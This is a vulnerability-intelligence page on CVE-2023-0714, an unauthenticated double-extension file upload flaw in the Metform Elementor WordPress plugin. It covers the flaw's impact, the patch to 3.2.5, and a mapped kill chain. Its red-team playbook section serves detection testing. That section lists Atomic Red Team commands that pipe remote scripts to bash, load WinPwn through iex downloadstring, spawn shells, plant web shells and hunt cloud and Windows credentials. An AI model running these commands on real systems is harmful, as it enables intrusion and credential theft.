CVE-2023-0714
Overview
This vulnerability is an arbitrary file upload flaw resulting from insufficient file type validation in the Metform Elementor Contact Form Builder plugin for WordPress. The affected component fails to properly verify uploaded file extensions, allowing files with double extensions to bypass security checks. The flaw resides in the file upload handling logic within the form builder's core processing functions prior to version 3.2.5.
Vulnerability Description
The Metform Elementor Contact Form Builder for WordPress is vulnerable to Arbitrary File Upload due to insufficient file type validation in versions up to, and including, 3.2.4. This allows unauthenticated visitors to perform a "double extension" attack and upload files containing a malicious extension but ending with a benign extension, which may make remote code execution possible in some configurations.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to upload malicious files disguised with double extensions, potentially leading to remote code execution if the server executes the uploaded payload. No authentication or user interaction is required (CVSS vector AV:N/AC:H/PR:N/UI:N), though the attack complexity is high due to the need for specific file crafting. Successful exploitation can result in full compromise of the affected WordPress site, including unauthorized data access, site defacement, or pivoting to internal networks.
Solution
Users should upgrade the Metform Elementor Contact Form Builder plugin to version 3.2.5 or later, where the file upload validation logic has been corrected to properly enforce file type restrictions. Detailed patch information and version updates are documented in the WordPress plugin repository changelog and the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/697ce433-f321-4977-a2ad-68369d9ce9c3. No alternative workarounds are documented; applying the vendor patch is required for mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the Metform Elementor Contact Form Builder for WordPress is characterized by insufficient validation of file types, which permits unauthorized file uploads. This flaw arises from the plugin's failure to adequately check the file extensions of uploaded content, allowing attackers to exploit a "double extension" technique. In this scenario, an attacker can upload a file that appears to be benign, such as an image or text file, while concealing a malicious payload within its true extension. For example, a file named "malicious.php.jpg" could be uploaded, where the server might only validate the ".jpg" extension, thereby permitting the execution of the PHP code contained within.
The exploitation of this vulnerability can occur through various attack vectors, primarily targeting websites that utilize the affected plugin without proper security measures in place. An unauthenticated visitor could leverage this weakness to upload a malicious file, which could then be executed on the server if the web application or server configuration allows for the execution of files in the upload directory. This scenario could lead to remote code execution, enabling the attacker to gain unauthorized access to the server, manipulate data, or deploy further malicious activities such as installing backdoors or malware.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on WordPress for their online presence. The potential for remote code execution poses severe risks, including data breaches, loss of sensitive information, and damage to the organization's reputation. Additionally, the financial implications can be substantial, as businesses may face costs associated with incident response, recovery efforts, and potential legal liabilities stemming from compromised customer data. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that it should be prioritized for remediation.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, it is essential to ensure that the Metform Elementor Contact Form Builder is updated to the latest version, as this may include patches that address the file upload issue. Regularly reviewing and updating all plugins and themes is a best practice for maintaining WordPress security. Additionally, employing a web application firewall (WAF) can help filter out malicious requests and block attempts to exploit this vulnerability. Organizations should also implement strict file type validation on the server side, ensuring that only specific file types are allowed for upload and that any uploaded files are scanned for malicious content before being processed.
In conclusion, the vulnerability in the Metform Elementor Contact Form Builder represents a critical security risk that can be exploited by attackers to execute arbitrary code on vulnerable WordPress installations. The implications of such an attack can be devastating, affecting both the integrity of the web application and the trust of its users. By adopting robust security measures, including regular updates, stringent file validation, and proactive monitoring, organizations can significantly reduce their exposure to this and similar vulnerabilities, thereby safeguarding their digital assets and maintaining operational resilience.
The CVSS score adjustment for CVE-2023-0714 from 9.8 to 8.1 reflects a refined understanding of the vulnerability’s exploitability and impact, indicating a slightly lower but still high risk profile. CSURFACE threat intelligence confirms that exploit activity remains stable without significant escalation or new proof-of-concept exploits emerging, suggesting that while the vulnerability continues to pose a serious threat, immediate exploitation pressure has not intensified. The EPSS score’s stability further corroborates this steady state, placing the vulnerability in a high-risk category but not one experiencing rapid growth in exploitation attempts. For defenders, this nuanced recalibration underscores the importance of maintaining vigilance and patching but also signals that the threat landscape has not deteriorated further. Consequently, the overall threat level remains high, warranting continued prioritization within security operations but without indication of an imminent surge in active exploitation campaigns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wpmet | Metform Elementor Contact Form Builder | All |
cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-0714 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/697ce433-f321-4977-a2ad-68369d9ce9c3?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/metform/trunk/core/entries/file-data-validation.php?rev=2746287 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/2896914/ |